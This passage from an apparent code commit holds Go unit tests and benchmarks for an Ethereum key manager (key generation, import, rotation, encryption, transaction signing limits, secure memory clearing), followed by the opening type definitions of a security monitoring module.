			wantErr: "encryption key must be at least 32 characters",
		},
		{
			name: "empty keystore path",
			cfg: &KeyManagerConfig{
				KeystorePath:  "",
				EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
			},
			wantErr: "keystore path cannot be empty",
		},
	}
	for _, tc := range cases {
		// Every invalid configuration must fail with a specific message and
		// return no manager.
		km, err := newKeyManagerForTesting(tc.cfg, log)
		assert.Error(t, err)
		assert.Nil(t, km)
		assert.Contains(t, err.Error(), tc.wantErr)
	}
}
// TestGenerateKey tests key generation functionality
func TestGenerateKey(t *testing.T) {
config := &KeyManagerConfig{
KeystorePath: "/tmp/test_keystore_generate",
EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
}
log := logger.New("info", "text", "")
km, err := newKeyManagerForTesting(config, log)
require.NoError(t, err)
// Test generating a trading key
permissions := KeyPermissions{
CanSign: true,
CanTransfer: true,
MaxTransferWei: big.NewInt(1000000000000000000), // 1 ETH
}
address, err := km.GenerateKey("trading", permissions)
require.NoError(t, err)
assert.NotEqual(t, common.Address{}, address)
// Verify the key exists
keyInfo, err := km.GetKeyInfo(address)
require.NoError(t, err)
assert.Equal(t, address, keyInfo.Address)
assert.Equal(t, "trading", keyInfo.KeyType)
assert.Equal(t, permissions, keyInfo.Permissions)
assert.WithinDuration(t, time.Now(), keyInfo.CreatedAt, time.Second)
assert.WithinDuration(t, time.Now(), keyInfo.GetLastUsed(), time.Second)
assert.Equal(t, int64(0), keyInfo.GetUsageCount())
// Test generating an emergency key (should have expiration)
emergencyAddress, err := km.GenerateKey("emergency", permissions)
require.NoError(t, err)
assert.NotEqual(t, common.Address{}, emergencyAddress)
emergencyKeyInfo, err := km.GetKeyInfo(emergencyAddress)
require.NoError(t, err)
assert.NotNil(t, emergencyKeyInfo.ExpiresAt)
assert.True(t, emergencyKeyInfo.ExpiresAt.After(time.Now()))
}
// TestImportKey tests key import functionality
func TestImportKey(t *testing.T) {
config := &KeyManagerConfig{
KeystorePath: "/tmp/test_keystore_import",
EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
}
log := logger.New("info", "text", "")
km, err := newKeyManagerForTesting(config, log)
require.NoError(t, err)
// Generate a test private key
privateKey, err := crypto.GenerateKey()
require.NoError(t, err)
privateKeyHex := common.Bytes2Hex(crypto.FromECDSA(privateKey))
// Import the key
permissions := KeyPermissions{
CanSign: true,
CanTransfer: false,
MaxTransferWei: nil,
}
address, err := km.ImportKey(privateKeyHex, "test", permissions)
require.NoError(t, err)
assert.NotEqual(t, common.Address{}, address)
// Verify the imported key
keyInfo, err := km.GetKeyInfo(address)
require.NoError(t, err)
assert.Equal(t, address, keyInfo.Address)
assert.Equal(t, "test", keyInfo.KeyType)
assert.Equal(t, permissions, keyInfo.Permissions)
// Test importing invalid key
_, err = km.ImportKey("invalid_private_key", "test", permissions)
assert.Error(t, err)
assert.Contains(t, err.Error(), "invalid private key")
// Test importing duplicate key
_, err = km.ImportKey(privateKeyHex, "duplicate", permissions)
assert.Error(t, err)
assert.Contains(t, err.Error(), "key already exists")
}
// TestListKeys tests key listing functionality
func TestListKeys(t *testing.T) {
config := &KeyManagerConfig{
KeystorePath: "/tmp/test_keystore_list",
EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
}
log := logger.New("info", "text", "")
km, err := newKeyManagerForTesting(config, log)
require.NoError(t, err)
// Initially should be empty
keys := km.ListKeys()
assert.Empty(t, keys)
// Generate a few keys
permissions := KeyPermissions{CanSign: true}
addr1, err := km.GenerateKey("test1", permissions)
require.NoError(t, err)
addr2, err := km.GenerateKey("test2", permissions)
require.NoError(t, err)
// Check that both keys are listed
keys = km.ListKeys()
assert.Len(t, keys, 2)
assert.Contains(t, keys, addr1)
assert.Contains(t, keys, addr2)
}
// TestGetKeyInfo tests key information retrieval
func TestGetKeyInfo(t *testing.T) {
config := &KeyManagerConfig{
KeystorePath: "/tmp/test_keystore_info",
EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
}
log := logger.New("info", "text", "")
km, err := newKeyManagerForTesting(config, log)
require.NoError(t, err)
// Generate a key
permissions := KeyPermissions{CanSign: true, CanTransfer: true}
address, err := km.GenerateKey("test", permissions)
require.NoError(t, err)
// Get key info
keyInfo, err := km.GetKeyInfo(address)
require.NoError(t, err)
assert.Equal(t, address, keyInfo.Address)
assert.Equal(t, "test", keyInfo.KeyType)
assert.Equal(t, permissions, keyInfo.Permissions)
// EncryptedKey should be nil in the returned info for security
assert.Nil(t, keyInfo.EncryptedKey)
// Test getting non-existent key
nonExistentAddr := common.HexToAddress("0x1234567890123456789012345678901234567890")
_, err = km.GetKeyInfo(nonExistentAddr)
assert.Error(t, err)
assert.Contains(t, err.Error(), "key not found")
}
// TestEncryptDecryptPrivateKey tests the encryption/decryption functionality
func TestEncryptDecryptPrivateKey(t *testing.T) {
config := &KeyManagerConfig{
KeystorePath: "/tmp/test_keystore_encrypt",
EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
}
log := logger.New("info", "text", "")
km, err := newKeyManagerForTesting(config, log)
require.NoError(t, err)
// Generate a test private key
privateKey, err := crypto.GenerateKey()
require.NoError(t, err)
// Test encryption
encryptedKey, err := km.encryptPrivateKey(privateKey)
require.NoError(t, err)
assert.NotNil(t, encryptedKey)
assert.NotEmpty(t, encryptedKey)
// Test decryption
decryptedKey, err := km.decryptPrivateKey(encryptedKey)
require.NoError(t, err)
assert.NotNil(t, decryptedKey)
// Verify the keys are the same
assert.Equal(t, crypto.PubkeyToAddress(privateKey.PublicKey), crypto.PubkeyToAddress(decryptedKey.PublicKey))
assert.Equal(t, crypto.FromECDSA(privateKey), crypto.FromECDSA(decryptedKey))
// Test decryption with invalid data
_, err = km.decryptPrivateKey([]byte("x")) // Very short data to trigger "encrypted key too short"
assert.Error(t, err)
assert.Contains(t, err.Error(), "encrypted key too short")
}
// TestRotateKey tests key rotation functionality
func TestRotateKey(t *testing.T) {
config := &KeyManagerConfig{
KeystorePath: "/tmp/test_keystore_rotate",
EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
}
log := logger.New("info", "text", "")
km, err := newKeyManagerForTesting(config, log)
require.NoError(t, err)
// Generate an original key
permissions := KeyPermissions{CanSign: true, CanTransfer: true}
originalAddr, err := km.GenerateKey("test", permissions)
require.NoError(t, err)
// Rotate the key
newAddr, err := km.RotateKey(originalAddr)
require.NoError(t, err)
assert.NotEqual(t, originalAddr, newAddr)
// Check that the original key still exists but has restricted permissions
originalInfo, err := km.GetKeyInfo(originalAddr)
require.NoError(t, err)
assert.False(t, originalInfo.Permissions.CanSign)
assert.False(t, originalInfo.Permissions.CanTransfer)
// Check that the new key has the same permissions
newInfo, err := km.GetKeyInfo(newAddr)
require.NoError(t, err)
assert.Equal(t, permissions, newInfo.Permissions)
assert.True(t, newInfo.Permissions.CanSign)
assert.True(t, newInfo.Permissions.CanTransfer)
// Test rotating non-existent key
nonExistentAddr := common.HexToAddress("0x1234567890123456789012345678901234567890")
_, err = km.RotateKey(nonExistentAddr)
assert.Error(t, err)
assert.Contains(t, err.Error(), "key not found")
}
// TestSignTransaction tests transaction signing with various scenarios:
// a successful EIP-1559 signing round-trip with signature recovery, a
// missing key, and a key lacking sign permission.
func TestSignTransaction(t *testing.T) {
	config := &KeyManagerConfig{
		KeystorePath:  "/tmp/test_keystore_sign",
		EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
	}
	log := logger.New("info", "text", "")
	km, err := newKeyManagerForTesting(config, log)
	require.NoError(t, err)
	// Generate a key with signing permissions
	permissions := KeyPermissions{
		CanSign:        true,
		CanTransfer:    true,
		MaxTransferWei: big.NewInt(1000000000000000000), // 1 ETH (safe int64 value)
	}
	signerAddr, err := km.GenerateKey("signer", permissions)
	require.NoError(t, err)
	// Create a test transaction using Arbitrum chain ID (EIP-155 transaction)
	chainID := big.NewInt(42161) // Arbitrum One
	// Create transaction data for EIP-155 transaction
	toAddr := common.HexToAddress("0x1234567890123456789012345678901234567890")
	value := big.NewInt(1000000000000000000) // 1 ETH
	gasLimit := uint64(21000)
	gasPrice := big.NewInt(20000000000) // 20 Gwei
	nonce := uint64(0)
	// Create DynamicFeeTx (EIP-1559) which properly handles chain ID
	tx := types.NewTx(&types.DynamicFeeTx{
		ChainID:   chainID,
		Nonce:     nonce,
		To:        &toAddr,
		Value:     value,
		Gas:       gasLimit,
		GasFeeCap: gasPrice,
		GasTipCap: big.NewInt(1000000000), // 1 Gwei tip
		Data:      nil,
	})
	// Create signing request
	request := &SigningRequest{
		Transaction:  tx,
		ChainID:      chainID,
		From:         signerAddr,
		Purpose:      "Test transaction",
		UrgencyLevel: 3,
	}
	// Sign the transaction and verify all result metadata is populated.
	result, err := km.SignTransaction(request)
	require.NoError(t, err)
	assert.NotNil(t, result)
	assert.NotNil(t, result.SignedTx)
	assert.NotNil(t, result.Signature)
	assert.NotEmpty(t, result.AuditID)
	assert.WithinDuration(t, time.Now(), result.SignedAt, time.Second)
	assert.Equal(t, signerAddr, result.KeyUsed)
	// Verify the signature is valid by recovering the sender address.
	signedTx := result.SignedTx
	// Use appropriate signer based on transaction type
	var signer types.Signer
	switch signedTx.Type() {
	case types.LegacyTxType:
		signer = types.NewEIP155Signer(chainID)
	case types.DynamicFeeTxType:
		signer = types.NewLondonSigner(chainID)
	default:
		t.Fatalf("Unsupported transaction type: %d", signedTx.Type())
	}
	from, err := types.Sender(signer, signedTx)
	require.NoError(t, err)
	assert.Equal(t, signerAddr, from)
	// Test signing with non-existent key (reuses the same request, mutating
	// From in place).
	nonExistentAddr := common.HexToAddress("0x1234567890123456789012345678901234567890")
	request.From = nonExistentAddr
	_, err = km.SignTransaction(request)
	assert.Error(t, err)
	assert.Contains(t, err.Error(), "key not found")
	// Test signing with key that can't sign, using a fresh manager so the
	// signing-capable key above is not present.
	km2, err := newKeyManagerForTesting(config, log)
	require.NoError(t, err)
	noSignPermissions := KeyPermissions{
		CanSign:        false,
		CanTransfer:    true,
		MaxTransferWei: big.NewInt(1000000000000000000), // 1 ETH (safe int64 value)
	}
	noSignAddr, err := km2.GenerateKey("no_sign", noSignPermissions)
	require.NoError(t, err)
	request.From = noSignAddr
	_, err = km2.SignTransaction(request)
	assert.Error(t, err)
	assert.Contains(t, err.Error(), "not permitted to sign")
}
// TestSignTransactionTransferLimits tests that signing is rejected when the
// transaction value exceeds the key's MaxTransferWei limit.
func TestSignTransactionTransferLimits(t *testing.T) {
	config := &KeyManagerConfig{
		// Isolated, auto-cleaned keystore per run instead of a fixed /tmp
		// path that could collide with other runs.
		KeystorePath:  t.TempDir(),
		EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
	}
	log := logger.New("info", "text", "")
	km, err := newKeyManagerForTesting(config, log)
	require.NoError(t, err)
	// Generate a key with limited transfer permissions
	maxTransfer := big.NewInt(1000000000000000000) // 1 ETH
	permissions := KeyPermissions{
		CanSign:        true,
		CanTransfer:    true,
		MaxTransferWei: maxTransfer,
	}
	signerAddr, err := km.GenerateKey("limited_signer", permissions)
	require.NoError(t, err)
	// Create a transaction that exceeds the limit (2 ETH > 1 ETH cap)
	chainID := big.NewInt(1)
	excessiveTx := types.NewTransaction(0, common.Address{}, big.NewInt(2000000000000000000), 21000, big.NewInt(20000000000), nil) // 2 ETH
	request := &SigningRequest{
		Transaction:  excessiveTx,
		ChainID:      chainID,
		From:         signerAddr,
		Purpose:      "Excessive transfer",
		UrgencyLevel: 3,
	}
	_, err = km.SignTransaction(request)
	assert.Error(t, err)
	assert.Contains(t, err.Error(), "transfer amount exceeds limit")
}
// TestDeriveEncryptionKey tests the key derivation function: a valid master
// key yields a 32-byte AES-256 key, different inputs yield different keys,
// and an empty master key is rejected.
func TestDeriveEncryptionKey(t *testing.T) {
	const (
		masterKey    = "test_encryption_key_very_long_and_secure_for_testing"
		differentKey = "different_test_encryption_key_very_long_and_secure_for_testing"
	)

	// A valid master key must produce a 32-byte derived key.
	derived, err := deriveEncryptionKey(masterKey)
	require.NoError(t, err)
	assert.NotNil(t, derived)
	assert.Len(t, derived, 32)

	// A different master key must not collide with the first.
	other, err := deriveEncryptionKey(differentKey)
	require.NoError(t, err)
	assert.NotEqual(t, derived, other)

	// An empty master key is invalid.
	_, err = deriveEncryptionKey("")
	assert.Error(t, err)
}
// TestValidateConfig tests the configuration validation function across a
// valid config and each individually-invalid field.
func TestValidateConfig(t *testing.T) {
	const goodKey = "test_encryption_key_very_long_and_secure_for_testing"

	cases := []struct {
		name    string
		config  *KeyManagerConfig
		wantErr string // empty means the config must pass validation
	}{
		{"valid", &KeyManagerConfig{KeystorePath: "/tmp/test", EncryptionKey: goodKey}, ""},
		{"empty encryption key", &KeyManagerConfig{KeystorePath: "/tmp/test", EncryptionKey: ""}, "encryption key cannot be empty"},
		{"short encryption key", &KeyManagerConfig{KeystorePath: "/tmp/test", EncryptionKey: "short"}, "encryption key must be at least 32 characters"},
		{"empty keystore path", &KeyManagerConfig{KeystorePath: "", EncryptionKey: goodKey}, "keystore path cannot be empty"},
	}

	for _, tc := range cases {
		t.Run(tc.name, func(t *testing.T) {
			err := validateConfig(tc.config)
			if tc.wantErr == "" {
				assert.NoError(t, err)
				return
			}
			assert.Error(t, err)
			assert.Contains(t, err.Error(), tc.wantErr)
		})
	}
}
// TestClearPrivateKey tests the private key clearing function: the secret
// scalar D must be wiped (nil or zero) and clearing nil must not panic.
func TestClearPrivateKey(t *testing.T) {
	key, err := crypto.GenerateKey()
	require.NoError(t, err)

	// Remember the secret scalar so we can prove it was wiped.
	savedD := new(big.Int).Set(key.D)

	clearPrivateKey(key)

	// After clearing, D is either nil or holds the value zero.
	if key.D == nil {
		assert.Nil(t, key.D)
	} else {
		assert.Zero(t, key.D.Sign())
	}
	assert.NotEqual(t, savedD, key.D)

	// Clearing a nil key must be a safe no-op.
	clearPrivateKey(nil)
}
// TestGenerateAuditID tests the audit ID generation function: consecutive
// IDs are non-empty, unique, and parse as non-zero hex hashes.
func TestGenerateAuditID(t *testing.T) {
	first := generateAuditID()
	second := generateAuditID()

	// Consecutive IDs must be non-empty and distinct.
	assert.NotEmpty(t, first)
	assert.NotEmpty(t, second)
	assert.NotEqual(t, first, second)

	// Each ID must decode to a non-zero hash.
	for _, id := range []string{first, second} {
		assert.NotEqual(t, common.HexToHash(id), common.Hash{})
	}
}
// TestCalculateRiskScore tests the risk score calculation function
func TestCalculateRiskScore(t *testing.T) {
// Test failed operations (high risk)
score := calculateRiskScore("TRANSACTION_SIGNED", false)
assert.Equal(t, 8, score)
// Test successful transaction signing (low-medium risk)
score = calculateRiskScore("TRANSACTION_SIGNED", true)
assert.Equal(t, 3, score)
// Test key generation (medium risk)
score = calculateRiskScore("KEY_GENERATED", true)
assert.Equal(t, 5, score)
// Test key import (medium risk)
score = calculateRiskScore("KEY_IMPORTED", true)
assert.Equal(t, 5, score)
// Test key rotation (medium risk)
score = calculateRiskScore("KEY_ROTATED", true)
assert.Equal(t, 4, score)
// Test default (low risk)
score = calculateRiskScore("UNKNOWN_OPERATION", true)
assert.Equal(t, 2, score)
}
// TestKeyPermissions tests that the KeyPermissions struct stores every
// field it is constructed with.
func TestKeyPermissions(t *testing.T) {
	limit := big.NewInt(1000000000000000000) // 1 ETH
	contracts := []string{
		"0x1234567890123456789012345678901234567890",
		"0x0987654321098765432109876543210987654321",
	}

	perms := KeyPermissions{
		CanSign:          true,
		CanTransfer:      true,
		MaxTransferWei:   limit,
		AllowedContracts: contracts,
		RequireConfirm:   true,
	}

	assert.True(t, perms.CanSign)
	assert.True(t, perms.CanTransfer)
	assert.Equal(t, limit, perms.MaxTransferWei)
	assert.Len(t, perms.AllowedContracts, 2)
	assert.True(t, perms.RequireConfirm)
}
// BenchmarkKeyGeneration benchmarks key generation performance.
func BenchmarkKeyGeneration(b *testing.B) {
	config := &KeyManagerConfig{
		// b.TempDir isolates the keystore per benchmark run and is removed
		// automatically, unlike a fixed /tmp path shared across runs.
		KeystorePath:  b.TempDir(),
		EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
	}
	log := logger.New("info", "text", "")
	km, err := newKeyManagerForTesting(config, log)
	require.NoError(b, err)
	permissions := KeyPermissions{CanSign: true}
	b.ResetTimer()
	for i := 0; i < b.N; i++ {
		if _, err := km.GenerateKey("benchmark", permissions); err != nil {
			b.Fatal(err)
		}
	}
}
// BenchmarkTransactionSigning benchmarks transaction signing performance.
func BenchmarkTransactionSigning(b *testing.B) {
	config := &KeyManagerConfig{
		// Isolated, auto-cleaned keystore per benchmark run.
		KeystorePath:  b.TempDir(),
		EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
	}
	log := logger.New("info", "text", "")
	km, err := newKeyManagerForTesting(config, log)
	require.NoError(b, err)
	permissions := KeyPermissions{CanSign: true, CanTransfer: true}
	signerAddr, err := km.GenerateKey("benchmark_signer", permissions)
	require.NoError(b, err)
	chainID := big.NewInt(1)
	tx := types.NewTransaction(0, common.Address{}, big.NewInt(1000000000000000000), 21000, big.NewInt(20000000000), nil)
	request := &SigningRequest{
		Transaction: tx,
		ChainID:     chainID,
		From:        signerAddr,
		Purpose:     "Benchmark transaction",
	}
	b.ResetTimer()
	for i := 0; i < b.N; i++ {
		if _, err := km.SignTransaction(request); err != nil {
			b.Fatal(err)
		}
	}
}
// ENHANCED: Unit tests for memory clearing verification
//
// Each subtest captures the sensitive value first, clears it, and then
// inspects the raw storage; the capture -> clear -> verify ordering is
// exactly what is being proven and must not be rearranged.
func TestMemoryClearing(t *testing.T) {
	t.Run("TestSecureClearBigInt", func(t *testing.T) {
		// Create a big.Int with sensitive data
		sensitiveValue := big.NewInt(0)
		sensitiveValue.SetString("123456789012345678901234567890123456789012345678901234567890", 10)
		// Capture the original bits for verification
		originalBits := make([]big.Word, len(sensitiveValue.Bits()))
		copy(originalBits, sensitiveValue.Bits())
		// Ensure we have actual data to clear
		require.True(t, len(originalBits) > 0, "Test requires non-zero big.Int")
		// Clear the sensitive value
		secureClearBigInt(sensitiveValue)
		// Verify all bits are zeroed (checks the backing words directly,
		// not just the numeric value)
		clearedBits := sensitiveValue.Bits()
		for i, bit := range clearedBits {
			assert.Equal(t, big.Word(0), bit, "Bit %d should be zero after clearing", i)
		}
		// Verify the value is actually zero
		assert.True(t, sensitiveValue.Cmp(big.NewInt(0)) == 0, "BigInt should be zero after clearing")
	})
	t.Run("TestSecureClearBytes", func(t *testing.T) {
		// Create sensitive byte data
		sensitiveData := []byte("This is very sensitive private key data that should be cleared")
		originalData := make([]byte, len(sensitiveData))
		copy(originalData, sensitiveData)
		// Verify we have data to clear
		require.True(t, len(sensitiveData) > 0, "Test requires non-empty byte slice")
		// Clear the sensitive data
		secureClearBytes(sensitiveData)
		// Verify all bytes are zeroed
		for i, b := range sensitiveData {
			assert.Equal(t, byte(0), b, "Byte %d should be zero after clearing", i)
		}
		// Verify the data was actually changed from its original contents
		assert.NotEqual(t, originalData, sensitiveData, "Data should be different after clearing")
	})
	t.Run("TestClearPrivateKey", func(t *testing.T) {
		// Generate a test private key
		privateKey, err := crypto.GenerateKey()
		require.NoError(t, err)
		// Store original values for verification
		originalD := new(big.Int).Set(privateKey.D)
		originalX := new(big.Int).Set(privateKey.PublicKey.X)
		originalY := new(big.Int).Set(privateKey.PublicKey.Y)
		// Verify we have actual key material before clearing
		require.True(t, originalD.Cmp(big.NewInt(0)) != 0, "Private key D should not be zero")
		require.True(t, originalX.Cmp(big.NewInt(0)) != 0, "Public key X should not be zero")
		require.True(t, originalY.Cmp(big.NewInt(0)) != 0, "Public key Y should not be zero")
		// Clear the private key
		clearPrivateKey(privateKey)
		// Verify all components are nil or zero (this variant nils out the
		// public key and curve as well as the secret scalar)
		assert.Nil(t, privateKey.D, "Private key D should be nil after clearing")
		assert.Nil(t, privateKey.PublicKey.X, "Public key X should be nil after clearing")
		assert.Nil(t, privateKey.PublicKey.Y, "Public key Y should be nil after clearing")
		assert.Nil(t, privateKey.PublicKey.Curve, "Curve should be nil after clearing")
	})
}
// ENHANCED: Test memory usage monitoring — verifies that GetMemoryMetrics
// reports the active key count as keys are added, including via the
// withMemoryProtection wrapper.
func TestKeyMemoryMetrics(t *testing.T) {
	config := &KeyManagerConfig{
		// Isolated, auto-cleaned keystore per run; avoids collisions on a
		// fixed /tmp path between runs.
		KeystorePath:      t.TempDir(),
		EncryptionKey:     "test_encryption_key_very_long_and_secure_for_testing",
		BackupEnabled:     false,
		MaxFailedAttempts: 3,
		LockoutDuration:   5 * time.Minute,
	}
	log := logger.New("info", "text", "")
	km, err := newKeyManagerForTesting(config, log)
	require.NoError(t, err)
	// Get initial metrics: no keys yet, but the manager itself uses memory
	initialMetrics := km.GetMemoryMetrics()
	assert.NotNil(t, initialMetrics)
	assert.Equal(t, 0, initialMetrics.ActiveKeys)
	assert.Greater(t, initialMetrics.MemoryUsageBytes, int64(0))
	// Generate some keys
	permissions := KeyPermissions{
		CanSign:        true,
		CanTransfer:    true,
		MaxTransferWei: big.NewInt(1000000000000000000),
	}
	addr1, err := km.GenerateKey("test", permissions)
	require.NoError(t, err)
	// Check metrics after adding a key
	metricsAfterKey := km.GetMemoryMetrics()
	assert.Equal(t, 1, metricsAfterKey.ActiveKeys)
	// Test memory protection wrapper
	err = withMemoryProtection(func() error {
		_, err := km.GenerateKey("test2", permissions)
		return err
	})
	require.NoError(t, err)
	// Check final metrics
	finalMetrics := km.GetMemoryMetrics()
	assert.Equal(t, 2, finalMetrics.ActiveKeys)
	// Note: No cleanup method available, keys remain for test duration
	_ = addr1 // Silence unused variable warning
}
// ENHANCED: Benchmark memory clearing performance
//
// Each sub-benchmark pre-allocates b.N inputs BEFORE b.ResetTimer so that
// only the clearing call itself is timed; the setup/timer ordering is
// deliberate and must not be rearranged. Note the setup cost is O(b.N)
// memory, which is the standard pattern for benchmarking destructive ops.
func BenchmarkMemoryClearing(b *testing.B) {
	b.Run("BenchmarkSecureClearBigInt", func(b *testing.B) {
		// Create test big.Int values (one per iteration; clearing is destructive)
		values := make([]*big.Int, b.N)
		for i := 0; i < b.N; i++ {
			values[i] = big.NewInt(0)
			values[i].SetString("123456789012345678901234567890123456789012345678901234567890", 10)
		}
		b.ResetTimer()
		for i := 0; i < b.N; i++ {
			secureClearBigInt(values[i])
		}
	})
	b.Run("BenchmarkSecureClearBytes", func(b *testing.B) {
		// Create test byte slices
		testData := make([][]byte, b.N)
		for i := 0; i < b.N; i++ {
			testData[i] = make([]byte, 64) // 64 bytes like a private key
			for j := range testData[i] {
				testData[i][j] = byte(j % 256)
			}
		}
		b.ResetTimer()
		for i := 0; i < b.N; i++ {
			secureClearBytes(testData[i])
		}
	})
	b.Run("BenchmarkClearPrivateKey", func(b *testing.B) {
		// Generate test private keys (key generation dominates setup time
		// but is excluded from the measured region by ResetTimer)
		keys := make([]*ecdsa.PrivateKey, b.N)
		for i := 0; i < b.N; i++ {
			key, err := crypto.GenerateKey()
			if err != nil {
				b.Fatal(err)
			}
			keys[i] = key
		}
		b.ResetTimer()
		for i := 0; i < b.N; i++ {
			clearPrivateKey(keys[i])
		}
	})
}

View File

@@ -0,0 +1,714 @@
package security
import (
"encoding/json"
"fmt"
"sync"
"time"
)
// SecurityMonitor provides comprehensive security monitoring and alerting.
// It buffers alerts on a channel drained by a background processor, keeps a
// bounded in-memory event log, and aggregates metrics. NewSecurityMonitor
// starts three background goroutines (alert processing, metrics collection,
// cleanup), all terminated by closing stopChan via Stop.
type SecurityMonitor struct {
	// Alert channels: alertChan carries queued alerts to the background
	// processor; closing stopChan stops all background goroutines.
	alertChan chan SecurityAlert
	stopChan  chan struct{}
	// Event tracking: an in-memory log capped at maxEvents (oldest entries
	// are dropped), guarded by eventsMutex.
	events      []SecurityEvent
	eventsMutex sync.RWMutex
	maxEvents   int
	// Metrics: aggregate counters plus hourly/daily buckets, guarded by
	// metricsMutex.
	metrics      *SecurityMetrics
	metricsMutex sync.RWMutex
	// Configuration: thresholds, intervals, retention windows.
	config *MonitorConfig
	// Alert handlers fanned out to by the alert processor.
	// NOTE(review): AddAlertHandler appends to this slice without a lock
	// while the processor reads it concurrently — register all handlers
	// right after construction, before alerts start flowing.
	alertHandlers []AlertHandler
}
// SecurityAlert represents a security alert queued for handler dispatch.
// The resolution fields (Resolved, ResolvedAt, ResolvedBy) are carried for
// serialization; nothing in this file sets them after creation.
type SecurityAlert struct {
	ID          string                 `json:"id"`
	Timestamp   time.Time              `json:"timestamp"`
	Level       AlertLevel             `json:"level"`
	Type        AlertType              `json:"type"`
	Title       string                 `json:"title"`
	Description string                 `json:"description"`
	Source      string                 `json:"source"`
	Data        map[string]interface{} `json:"data"`
	Actions     []string               `json:"recommended_actions"`
	Resolved    bool                   `json:"resolved"`
	ResolvedAt  *time.Time             `json:"resolved_at,omitempty"`
	ResolvedBy  string                 `json:"resolved_by,omitempty"`
}
// SecurityEvent represents a security-related event stored in the monitor's
// in-memory log. IPAddress and UserAgent are populated by RecordEvent from
// the Data map when string values are present under the "ip_address" and
// "user_agent" keys.
type SecurityEvent struct {
	ID          string                 `json:"id"`
	Timestamp   time.Time              `json:"timestamp"`
	Type        EventType              `json:"type"`
	Source      string                 `json:"source"`
	Description string                 `json:"description"`
	Data        map[string]interface{} `json:"data"`
	Severity    EventSeverity          `json:"severity"`
	IPAddress   string                 `json:"ip_address,omitempty"`
	UserAgent   string                 `json:"user_agent,omitempty"`
}
// SecurityMetrics tracks security-related metrics. Within this file only a
// subset is incremented by updateMetricsForEvent (TotalRequests, the
// key-access and transaction counters, and the hourly/daily buckets); the
// remaining counters are not written here and presumably belong to other
// components — TODO confirm their producers.
type SecurityMetrics struct {
	// Request metrics
	TotalRequests      int64 `json:"total_requests"`
	BlockedRequests    int64 `json:"blocked_requests"`
	SuspiciousRequests int64 `json:"suspicious_requests"`
	// Attack metrics
	DDoSAttempts         int64 `json:"ddos_attempts"`
	BruteForceAttempts   int64 `json:"brute_force_attempts"`
	SQLInjectionAttempts int64 `json:"sql_injection_attempts"`
	// Rate limiting metrics
	RateLimitViolations int64 `json:"rate_limit_violations"`
	IPBlocks            int64 `json:"ip_blocks"`
	// Key management metrics
	KeyAccessAttempts int64 `json:"key_access_attempts"`
	FailedKeyAccess   int64 `json:"failed_key_access"`
	KeyRotations      int64 `json:"key_rotations"`
	// Transaction metrics
	TransactionsAnalyzed   int64 `json:"transactions_analyzed"`
	SuspiciousTransactions int64 `json:"suspicious_transactions"`
	BlockedTransactions    int64 `json:"blocked_transactions"`
	// Time series data, keyed "2006-01-02-15" (hourly) and "2006-01-02" (daily)
	HourlyMetrics map[string]int64 `json:"hourly_metrics"`
	DailyMetrics  map[string]int64 `json:"daily_metrics"`
	// Last update timestamp, refreshed on every metrics write
	LastUpdated time.Time `json:"last_updated"`
}
// AlertLevel represents the severity level of an alert, from informational
// up to critical.
type AlertLevel string

const (
	AlertLevelInfo     AlertLevel = "INFO"
	AlertLevelWarning  AlertLevel = "WARNING"
	AlertLevelError    AlertLevel = "ERROR"
	AlertLevelCritical AlertLevel = "CRITICAL"
)

// AlertType represents the category of security alert raised by the monitor
// (attack patterns, access violations, and operational issues).
type AlertType string

const (
	AlertTypeDDoS          AlertType = "DDOS"
	AlertTypeBruteForce    AlertType = "BRUTE_FORCE"
	AlertTypeRateLimit     AlertType = "RATE_LIMIT"
	AlertTypeUnauthorized  AlertType = "UNAUTHORIZED_ACCESS"
	AlertTypeSuspicious    AlertType = "SUSPICIOUS_ACTIVITY"
	AlertTypeKeyCompromise AlertType = "KEY_COMPROMISE"
	AlertTypeTransaction   AlertType = "SUSPICIOUS_TRANSACTION"
	AlertTypeConfiguration AlertType = "CONFIGURATION_ISSUE"
	AlertTypePerformance   AlertType = "PERFORMANCE_ISSUE"
)

// EventType represents the kind of security event recorded in the log.
type EventType string

const (
	EventTypeLogin         EventType = "LOGIN"
	EventTypeLogout        EventType = "LOGOUT"
	EventTypeKeyAccess     EventType = "KEY_ACCESS"
	EventTypeTransaction   EventType = "TRANSACTION"
	EventTypeConfiguration EventType = "CONFIGURATION_CHANGE"
	EventTypeError         EventType = "ERROR"
	EventTypeAlert         EventType = "ALERT"
)

// EventSeverity represents the severity of a security event; HIGH and
// CRITICAL events can trigger alerts (see checkForAlerts).
type EventSeverity string

const (
	SeverityLow      EventSeverity = "LOW"
	SeverityMedium   EventSeverity = "MEDIUM"
	SeverityHigh     EventSeverity = "HIGH"
	SeverityCritical EventSeverity = "CRITICAL"
)
// MonitorConfig provides configuration for security monitoring. Zero-valued
// numeric/duration fields are replaced by the defaults from
// defaultMonitorConfig when passed to NewSecurityMonitor; the boolean and
// string fields are copied as-is.
type MonitorConfig struct {
	// Alert settings
	EnableAlerts   bool          `json:"enable_alerts"`
	AlertBuffer    int           `json:"alert_buffer"`    // capacity of the alert channel
	AlertRetention time.Duration `json:"alert_retention"`
	// Event settings
	MaxEvents      int           `json:"max_events"`      // cap on the in-memory event log
	EventRetention time.Duration `json:"event_retention"` // age limit enforced by cleanup
	// Monitoring intervals
	MetricsInterval time.Duration `json:"metrics_interval"`
	CleanupInterval time.Duration `json:"cleanup_interval"`
	// Thresholds
	DDoSThreshold      int     `json:"ddos_threshold"` // events per 5 minutes before DDoS checks fire
	ErrorRateThreshold float64 `json:"error_rate_threshold"`
	// Notification settings
	EmailNotifications bool   `json:"email_notifications"`
	SlackNotifications bool   `json:"slack_notifications"`
	WebhookURL         string `json:"webhook_url"`
}
// AlertHandler defines the interface for handling security alerts.
// The monitor invokes handlers concurrently (one goroutine per alert per
// handler), so implementations must be safe for concurrent use.
type AlertHandler interface {
	// HandleAlert delivers one alert; a non-nil error is recorded by the
	// monitor as a medium-severity error event.
	HandleAlert(alert SecurityAlert) error
